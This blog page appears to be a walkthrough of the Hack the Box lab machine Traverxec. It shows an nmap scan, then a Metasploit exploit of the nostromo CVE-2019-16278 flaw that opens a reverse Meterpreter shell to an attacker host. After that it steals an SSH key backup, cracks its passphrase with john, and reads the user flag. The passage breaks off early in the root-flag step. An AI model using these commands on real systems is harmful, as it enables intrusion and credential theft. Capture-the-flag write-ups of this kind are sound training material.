<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
    










    







<script defer language="javascript" type="text/javascript" src="/js/bundle.min.d451ff92e80abc2a828eb9bb262e4db374bd4e954642f9245c54eec84bf690f3.js"></script>






    
    <meta http-equiv="content-type" content="text/html; charset=utf-8">

    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    
    <link rel="icon" href=/images/favicon.ico>

    
    





  





  
  
  


<!-- Open Graph image and Twitter Card metadata -->

<title itemprop="name">Ryan Kozak - Hack the Box Traverxec Writeup</title>
<meta property="og:title" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traverxec&#32;Writeup />
<meta name="twitter:title" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traverxec&#32;Writeup />
<meta itemprop="name" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traverxec&#32;Writeup />
<meta name="application-name" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Traverxec&#32;Writeup />
<meta property="og:site_name" content="" />


<meta name="description" content="" />
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />


<base href="/posts/hack-the-box-traverxec-writeup/" />
<link rel="canonical" href="/posts/hack-the-box-traverxec-writeup/" itemprop="url" />
<meta name="url" content="/posts/hack-the-box-traverxec-writeup/" />
<meta name="twitter:url" content="/posts/hack-the-box-traverxec-writeup/" />
<meta property="og:url" content="/posts/hack-the-box-traverxec-writeup/" />


<meta property="og:updated_time" content="2020-04-12T19:04:31-07:00" />


<link rel="sitemap" type="application/xml" title="Sitemap" href='/sitemap.xml' />

<meta name="robots" content="index,follow" />
<meta name="googlebot" content="index,follow" />



<meta property="fb:admins" content="" />


<meta name="apple-mobile-web-app-title" content="" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />






<meta name="generator" content="Hugo 0.150.1">


    
    

<link type="text/css" rel="stylesheet" href="/css/bundle.min.ab30c914ed666e25ece645343dde13c45c5a0aa0f9f0b4f3a8343cd3f46719a4.css">


    
    <style>
    body {
        --sidebar-bg-color: #202020;
        --sidebar-img-border-color: #515151;
        --sidebar-p-color: #909090;
        --sidebar-h1-color: #FFF;
        --sidebar-a-color: #FFF;
        --sidebar-socials-color: #FFF;
        --text-color: #222;
        --bkg-color: #FAF9F6;
        --post-title-color: #303030;
        --list-color: #5A5A5A;
        --link-color: #268BD2;
        --date-color: #515151;
        --table-border-color: #E5E5E5;
        --table-stripe-color: #F9F9F9;
        --code-color: #000;
        --code-background-color: #E5E5E5;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
        --moon-sun-color: #FFF;
        --moon-sun-background-color: #515151;
    }
    body.dark-theme {
        --text-color: #EEE;
        --bkg-color: #121212;
        --post-title-color: #DBE2E9;
        --list-color: #9D9D9D;
        --link-color: #268BD2;
        --date-color: #9A9A9A;
        --table-border-color: #515151;
        --table-stripe-color: #202020;
        --code-color: #FFF;
        --code-background-color: #515151;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
    }
    body {
        background-color: var(--bkg-color);
    }
</style>

    
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type":  "Person",
  "@id":    "https://ryankozak.com/#ryan-kozak",
  "name":   "Ryan Kozak",
  "jobTitle": "Offensive Security Engineer - Security Researcher",
  "url":    "https://ryankozak.com",
  "image":  "https://ryankozak.com/images/ryan-kozak.jpg",
  "description": "Known hacker, cybersecurity researcher, former OWASP Sacramento Chapter lead, credited with multiple CVEs.",
  "sameAs": [
      "https://github.com/d0n601",
      "https://www.linkedin.com/in/ryan-kozak\/",
      "https://patchstack.com/database/researcher/ryan-kozak",
      "https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed9aaed9-ca13-413a-a5e3-af97095a4252",
      "https://stackoverflow.com/users/4681506/ryan-kozak"
  ],
  "knowsAbout": ["Hacking", "Red Teaming", "Offensive Security", "Penetration Testing", "Programming"]
}
</script> 
    <script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "WebSite",
  "@id": "https://ryankozak.com/#website",
  "url": "https://ryankozak.com/",
  "name": "RyanKozak.com",
  "publisher": { "@id": "https://ryankozak.com/#ryan-kozak" },
}
</script>
    
    </head>

    <body class="">
        <div class="wrapper">
            <aside class="sidebar">
    <div class="container sidebar-sticky">
        <div class="light-dark" align="right">
    <button class="btn-light-dark" title="Toggle light/dark mode">
        <svg class="moon" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M6 .278a.768.768 0 0 1 .08.858a7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277c.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316a.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71C0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
        </svg>
        <svg class="sun" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M8 12a4 4 0 1 0 0-8a4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"/>
        </svg>
    </button>
</div>

        <div class="sidebar-about">
    <h1 class="brand">
        
            <a href="/">
                <img src="/images/d0n601.jpg" alt="brand image">
            </a>
        
        
            <a href="/">
                <h1>Ryan Kozak</h1>
            </a>
        
    </h1>
    <p class="lead">
    Hacking, CVEs, Development, and Other Things.
    </p>
</div>

        <nav>
    <ul class="sidebar-nav">

        
        
        
        
            

            
                
                
                    <li class="heading">
                        <a href="/about">About Me</a>
                    </li>
                    
                
            
                
                
            
            
                
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
                    <li class="heading">
                        <a href="/posts/">Recent</a>
                    </li>
                    
                        <li class="sub-heading">
                            
                        </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-9216/">StoreEngine – Powerful WordPress eCommerce Plugin for Payments, Memberships, Affiliates, Sales &amp; More &lt;= 1.4.0 - Authenticated (Subscriber&#43;) Arbitrary File Upload</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-9215/">StoreEngine Powerful WordPress eCommerce Plugin for Payments, Memberships, Affiliates, Sales &amp; More &lt;= 1.4.0 - Authenticated (Subscriber&#43;) Arbitrary File Download</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-6085/">Make Connector &lt;= 1.5.10 - Authenticated (Admin&#43;) Arbitrary File Upload</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-23968/">AI Bud – AI Content Generator, AI Chatbot, ChatGPT, Gemini, GPT-4o</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-6586/">Download Plugin &lt;= 2.2.8 - Authenticated (Admin&#43;) Arbitrary File Upload via the dpwap_plugin_locInstall Function</a>
                            </li>
                        
                    
                
            
            
                
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        

    </ul>
</nav>

        
    <a target="_blank" class="social" title="GitHub" href="https://github.com/d0n601">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="-2 -2 24 24">
            <path fill="currentColor" d="M18.88 1.099C18.147.366 17.265 0 16.233 0H3.746C2.714 0 1.832.366 1.099 1.099C.366 1.832 0 2.714 0 3.746v12.487c0 1.032.366 1.914 1.099 2.647c.733.733 1.615 1.099 2.647 1.099H6.66c.19 0 .333-.007.429-.02a.504.504 0 0 0 .286-.169c.095-.1.143-.245.143-.435l-.007-.885c-.004-.564-.006-1.01-.006-1.34l-.3.052c-.19.035-.43.05-.721.046a5.555 5.555 0 0 1-.904-.091a2.026 2.026 0 0 1-.872-.39a1.651 1.651 0 0 1-.572-.8l-.13-.3a3.25 3.25 0 0 0-.41-.663c-.186-.243-.375-.407-.566-.494l-.09-.065a.956.956 0 0 1-.17-.156a.723.723 0 0 1-.117-.182c-.026-.061-.004-.111.065-.15c.07-.04.195-.059.378-.059l.26.04c.173.034.388.138.643.311a2.1 2.1 0 0 1 .631.677c.2.355.44.626.722.813c.282.186.566.28.852.28c.286 0 .533-.022.742-.065a2.59 2.59 0 0 0 .585-.196c.078-.58.29-1.028.637-1.34a8.907 8.907 0 0 1-1.333-.234a5.314 5.314 0 0 1-1.223-.507a3.5 3.5 0 0 1-1.047-.872c-.277-.347-.505-.802-.683-1.365c-.177-.564-.266-1.215-.266-1.952c0-1.049.342-1.942 1.027-2.68c-.32-.788-.29-1.673.091-2.652c.252-.079.625-.02 1.119.175c.494.195.856.362 1.086.5c.23.14.414.257.553.352a9.233 9.233 0 0 1 2.497-.338c.859 0 1.691.113 2.498.338l.494-.312a6.997 6.997 0 0 1 1.197-.572c.46-.174.81-.221 1.054-.143c.39.98.424 1.864.103 2.653c.685.737 1.028 1.63 1.028 2.68c0 .737-.089 1.39-.267 1.957c-.177.568-.407 1.023-.689 1.366a3.65 3.65 0 0 1-1.053.865c-.42.234-.828.403-1.223.507a8.9 8.9 0 0 1-1.333.235c.45.39.676 1.005.676 1.846v3.11c0 .147.021.266.065.357a.36.36 0 0 0 .208.189c.096.034.18.056.254.064c.074.01.18.013.318.013h2.914c1.032 0 1.914-.366 2.647-1.099c.732-.732 1.099-1.615 1.099-2.647V3.746c0-1.032-.367-1.914-1.1-2.647z"/>
        </svg>
    </a>



    <a target="_blank" class="social" title="LinkedIn" href="https://www.linkedin.com/in/ryan-kozak/">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 448 512">
            <path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5c0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7c-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5c67.2 0 79.7 44.3 79.7 101.9V416z"/>
        </svg>
    </a>















    <a target="_blank" class="social" title="RSS Feed" href="/posts/index.xml">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 1280.000000 1280.000000">
            <g transform="translate(0.000000,1280.000000) scale(0.100000,-0.100000)" fill="currentColor">
                <path d="M2295 11929 c-284 -12 -642 -45 -707 -65 -17 -5 -18 -63 -18 -1039 0 -569 4 -1036 8 -1039 5 -3 74 6 153 19 510 86 1168 95 1789 25 1348 -153 2602 -677 3670 -1531 385 -308 820 -744 1126 -1129 842 -1060 1362 -2313 1514 -3650 70 -621 61 -1279 -25 -1789 -13 -79 -22 -148 -19 -153 3 -4 471 -8 1039 -8 l1035 0 5 23 c51 225 85 942 67 1419 -23 605 -77 1044 -198 1617 -294 1400 -927 2734 -1823 3846 -1043 1295 -2364 2259 -3909 2854 -1158 447 -2451 656 -3707 600z"/>
                <path d="M2255 7845 c-269 -25 -620 -81 -667 -106 -17 -9 -18 -55 -18 -899 0 -706 3 -890 13 -890 6 0 66 18 132 41 130 44 288 79 467 105 154 21 577 30 749 15 1207 -107 2267 -823 2814 -1902 166 -327 268 -637 330 -1001 38 -227 48 -384 42 -662 -8 -348 -44 -590 -126 -831 -23 -66 -41 -126 -41 -132 0 -10 184 -13 890 -13 844 0 890 1 899 18 27 50 88 452 110 725 14 162 14 624 1 782 -59 703 -233 1323 -545 1945 -481 956 -1313 1788 -2270 2268 -620 310 -1239 483 -1940 542 -165 14 -669 10 -840 -5z"/>
                <path d="M2519 3815 c-391 -66 -725 -336 -868 -703 -79 -201 -96 -462 -45 -677 83 -344 338 -641 666 -774 116 -47 205 -69 330 -80 412 -39 811 153 1040 500 193 292 240 648 128 981 -135 403 -492 699 -914 757 -100 14 -241 12 -337 -4z"/>
            </g>
        </svg>
    </a>


    <a target="_blank" class="social" title="Email" href="mailto:website@ryankozak.com">
       <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 485.211 485.211">
            <path fill="currentColor" d="M301.393,241.631L464.866,424.56H20.332l163.474-182.928l58.801,51.443L301.393,241.631z M462.174,60.651H23.027 l219.579,192.142L462.174,60.651z M324.225,221.67l160.986,180.151V80.792L324.225,221.67z M0,80.792v321.029L160.972,221.64 L0,80.792z"/>
       </svg>
    </a>




        <p class="footnote">
    &copy; 2025 . All rights reserved.
</p>

  </div>
</aside>

            <main class="content container">
                <script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "TechArticle",
  "@id": "\/posts\/hack-the-box-traverxec-writeup\/#article",
  "headline": "\"Hack the Box Traverxec Writeup\"",
  "author": { "@id": "" },
  "datePublished": "2020-04-12",
  "dateModified": "2020-04-12",
  "inLanguage": "en",
  "mainEntityOfPage": { "@type": "WebPage", "@id": "\/posts\/hack-the-box-traverxec-writeup\/" }
}
</script>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type":    "TechArticle",
  "headline": "\"Hack the Box Traverxec Writeup\"",
  "datePublished": "2020-04-12",
  "dateModified":  "2020-04-12",
  "author":   { "@id": "\/#ryan-kozak" },
  "publisher": {
    "@type": "Organization",
    "name":  "Ryan Kozak",
    "logo": {
      "@type": "ImageObject",
      "url": "\/images\/d0n601.png"
    }
  },
  "image": "null",
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "\/posts\/hack-the-box-traverxec-writeup\/"
  }
}
</script>
<div class="post">
  <div class="info">
  <h1 class="post-title">
    <a href="/posts/hack-the-box-traverxec-writeup/">Hack the Box Traverxec Writeup</a>
  </h1>

  <div class="headline">
    <div>
      
      
      <time datetime=" 2020-04-12T19:04:31-0700" class="post-date">
        April 12, 2020
      </time>
      
      <span> - </span>
      <span class="reading-time">
        
          
        

        <span>8 mins read</span>
      </span>
    </div>

    
  </div>

  
  

  
</div>

  <p><img src="/posts/images/hack-the-box-traverxec-writeup/badge.png" alt="Hack The Box Haystack"></p>
<h1 id="introduction">Introduction</h1>
<p>Traverxec is an easy box worth 20 points, hosted on <code>10.10.10.165</code>. As we will see the name is indicative of the vulnerability we&rsquo;ll leverage to gain our initial foothold. Despite having had difficulty with a few steps, when it&rsquo;s all said and done the box is rather simple. This writeup is a short one because of that.</p>
<h1 id="information-gathering">Information Gathering</h1>
<p>As always, we&rsquo;ll add the IP of the box to our <code>/etc/hosts</code> file. So, from here on out <code>traverxec.htb</code> points to <code>10.10.10.165</code>.</p>
<h2 id="port-scan-nmap">Port Scan: Nmap</h2>
<p>We begin our reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>root@kali:/media/sf_Research# nmap -sVC traverxec.htb
</span></span><span style="display:flex;"><span>Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-12 15:40 EST
</span></span><span style="display:flex;"><span>Nmap scan report for traverxec.htb (10.10.10.165)
</span></span><span style="display:flex;"><span>Host is up (0.84s latency).
</span></span><span style="display:flex;"><span>Not shown: 998 filtered ports
</span></span><span style="display:flex;"><span>PORT   STATE SERVICE VERSION
</span></span><span style="display:flex;"><span>22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
</span></span><span style="display:flex;"><span>| ssh-hostkey: 
</span></span><span style="display:flex;"><span>|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
</span></span><span style="display:flex;"><span>|_  256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
</span></span><span style="display:flex;"><span>80/tcp open  http    nostromo 1.9.6
</span></span><span style="display:flex;"><span>|_http-server-header: nostromo 1.9.6
</span></span><span style="display:flex;"><span>|_http-title: TRAVERXEC
</span></span><span style="display:flex;"><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style="display:flex;"><span>Nmap done: 1 IP address (1 host up) scanned in 196.10 seconds
</span></span></code></pre></div><p>The most important thing to notice here is that the web server running on this box is <strong>nostromo 1.9.6</strong>. Running a quick search for known vulnerabilities we find <a href="https://www.cvedetails.com/cve/CVE-2019-16278/" target="_blank">CVE-2019-16278</a>, which is a remote code execution bug.</p>
<blockquote>
<p>Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.</p></blockquote>
<p>Given the name of this box, we&rsquo;re certainly going to be exploiting this to gain our initial foothold.</p>
<h1 id="exploitation">Exploitation</h1>
<h2 id="foothold">Foothold</h2>
<p>We can use Metasploit&rsquo;s module for <a href="https://github.com/rapid7/metasploit-framework/pull/12476" target="_blank">CVE-2019-16278</a> and get a Meterpreter session on the box.</p>
<pre tabindex="0"><code>root@kali:~# msfconsole
[-] ***
                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       &#39;   dB&#39;                     BBP
    dB&#39;dB&#39;dB&#39; dBBP     dBP     dBP BB
   dB&#39;dB&#39;dB&#39; dBP      dBP     dBP  BB
  dB&#39;dB&#39;dB&#39; dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB&#39; dBP    dB&#39;.BP
                             |       dBP    dBBBB&#39; dBP    dB&#39;.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB&#39;.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1079 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 &gt; set RHOSTS traverxec.htb
RHOSTS =&gt; traverxec.htb
msf5 &gt; set LPORT 80
LPORT =&gt; 80
msf5 &gt; use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) &gt; set LHOST 10.10.15.60
LHOST =&gt; 10.10.15.60
msf5 exploit(multi/http/nostromo_code_exec) &gt; set LPORT 1337
LPORT =&gt; 1337
msf5 exploit(multi/http/nostromo_code_exec) &gt; set payload linux/x86/meterpreter/reverse_tcp
payload =&gt; linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) &gt; set target 1
target =&gt; 1
msf5 exploit(multi/http/nostromo_code_exec) &gt; run

[*] Started reverse TCP handler on 10.10.15.60:1337 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x64/meterpreter/reverse_tcp command stager
[*] Sending stage (3021284 bytes) to 10.10.10.165
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (10.10.15.60:1337 -&gt; 10.10.10.165:47402) at 2019-12-17 13:27:54 -0500

meterpreter &gt; 
</code></pre><h2 id="user-flag">User Flag</h2>
<p>After some manual exploration we find some interesting content inside of the <code>/var/nostromo/conf</code> directory. There&rsquo;s an <code>.htpasswd</code> file, but we don&rsquo;t need to use that, at least not the way we&rsquo;re going about this. What&rsquo;s interesting in this directory is the configuration file, <code>nhttpd.conf</code>, which indicates the existence of another folder we need to take a look at.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>meterpreter &gt; cd /var/nostromo/conf
</span></span><span style="display:flex;"><span>meterpreter &gt; ls
</span></span><span style="display:flex;"><span>Listing: /var/nostromo/conf
</span></span><span style="display:flex;"><span>===========================
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Mode              Size  Type  Last modified              Name
</span></span><span style="display:flex;"><span>----              ----  ----  -------------              ----
</span></span><span style="display:flex;"><span>100644/rw-r--r--  41    fil   2019-10-25 15:20:50 -0400  .htpasswd
</span></span><span style="display:flex;"><span>100644/rw-r--r--  2928  fil   2019-10-25 14:43:20 -0400  mimes
</span></span><span style="display:flex;"><span>100644/rw-r--r--  498   fil   2019-10-27 16:12:13 -0400  nhttpd.conf
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>meterpreter &gt; cat nhttpd.conf
</span></span><span style="display:flex;"><span># MAIN <span style="color:#f92672">[</span>MANDATORY<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>servername    traverxec.htb
</span></span><span style="display:flex;"><span>serverlisten    *
</span></span><span style="display:flex;"><span>serveradmin   david@traverxec.htb
</span></span><span style="display:flex;"><span>serverroot    /var/nostromo
</span></span><span style="display:flex;"><span>servermimes   conf/mimes
</span></span><span style="display:flex;"><span>docroot     /var/nostromo/htdocs
</span></span><span style="display:flex;"><span>docindex    index.html
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span># LOGS <span style="color:#f92672">[</span>OPTIONAL<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>logpid      logs/nhttpd.pid
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span># SETUID <span style="color:#f92672">[</span>RECOMMENDED<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>user      www-data
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span># BASIC AUTHENTICATION <span style="color:#f92672">[</span>OPTIONAL<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>htaccess    .htaccess
</span></span><span style="display:flex;"><span>htpasswd    /var/nostromo/conf/.htpasswd
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span># ALIASES <span style="color:#f92672">[</span>OPTIONAL<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>/icons      /var/nostromo/icons
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span># HOMEDIRS <span style="color:#f92672">[</span>OPTIONAL<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>homedirs    /home
</span></span><span style="display:flex;"><span>homedirs_public   public_www
</span></span></code></pre></div><p>The configuration file above indicates the existence of a <code>public_www</code> directory inside the <code>/home</code> directory. After some trial and error, we can determine that this is David&rsquo;s home directory, as he&rsquo;s the admin.</p>
<pre tabindex="0"><code>meterpreter &gt; cd /home/david/public_www
meterpreter &gt; ls
Listing: /home/david/public_www
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  402   fil   2019-10-25 15:45:10 -0400  index.html
40755/rwxr-xr-x   4096  dir   2019-10-25 17:02:59 -0400  protected-file-area
</code></pre><p>Now we find a directory named <code>protected-file-area</code> inside of <code>/home/david/public_www</code>. This folder contains <code>backup-ssh-identity-files.tgz</code>, which we can hopefully use to gain user access to the box as david.</p>
<pre tabindex="0"><code>meterpreter &gt; cd ./protected-file-area
meterpreter &gt; ls
Listing: /home/david/public_www/protected-file-area
===================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  45    fil   2019-10-25 15:46:01 -0400  .htaccess
100644/rw-r--r--  1915  fil   2019-10-25 17:02:59 -0400  backup-ssh-identity-files.tgz

meterpreter &gt; download ./backup-ssh-identity-files.tgz ./
[*] Downloading: ./backup-ssh-identity-files.tgz -&gt; .//backup-ssh-identity-files.tgz
[*] Downloaded 1.87 KiB of 1.87 KiB (100.0%): ./backup-ssh-identity-files.tgz -&gt; .//backup-ssh-identity-files.tgz
[*] download   : ./backup-ssh-identity-files.tgz -&gt; .//backup-ssh-identity-files.tgz
meterpreter &gt; 
</code></pre><p>We can download the <code>backup-ssh-identity-files.tgz</code> file through our Meterpreter session, and then extract it on our Kali box.</p>
<pre tabindex="0"><code>root@kali:~# tar -zxvf backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
</code></pre><p>When we try and use the keys we&rsquo;ll see that David has set a password required to unlock them, annoying. Using <code>ssh2john</code> we can create a hash of the private key to use to brute force the key through john.</p>
<pre tabindex="0"><code>root@kali:~/home/david/.ssh# python ~/Tools/ssh2john.py id_rsa &gt; id_rsa_hash
root@kali:~/home/david/.ssh# ls -lah
total 24K
drwx------ 2 1000 1000 4.0K Dec 15 19:55 .
drwxr-xr-x 3 root root 4.0K Dec 12 20:27 ..
-rw-r--r-- 1 1000 1000  397 Oct 25 17:02 authorized_keys
-rw------- 1 1000 1000 1.8K Oct 25 17:02 id_rsa
-rw-r--r-- 1 root root 2.5K Dec 15 19:55 id_rsa_hash
-rw-r--r-- 1 1000 1000  397 Oct 25 17:02 id_rsa.pub
root@kali:~/home/david/.ssh# john id_rsa_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press &#39;q&#39; or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:06 DONE (2019-12-15 19:56) 0.1547g/s 2220Kp/s 2220Kc/s 2220KC/sa6_123..*7¡Vamos!
Session completed
root@kali:~/home/david/.ssh# 
</code></pre><p>After running john and the <code>rockyou.txt</code> wordlist to try and crack the key, we get <code>hunter</code>. Now that we&rsquo;ve got the got the keys and the credentials to use them, we can ssh in as David and grab the flag.</p>
<pre tabindex="0"><code>root@kali:~/home/david/.ssh# ssh david@traverxec.htb

Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Sun Dec 15 19:54:38 2019 from 10.10.15.105
david@traverxec:~$ 
david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
</code></pre><h2 id="root-flag">Root Flag</h2>
<p>David&rsquo;s home directory has a directory within it called <code>/bin</code>, which sticks out immediately. Exploring that directory we find <code>server-stats.sh</code>. This file appears to use the sudo command, as seen on the last line below.</p>
<pre tabindex="0"><code>david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~/bin$ ls
journalctl  server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo &#34;Load: `/usr/bin/uptime`&#34;
echo &#34; &#34;
echo &#34;Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`&#34;
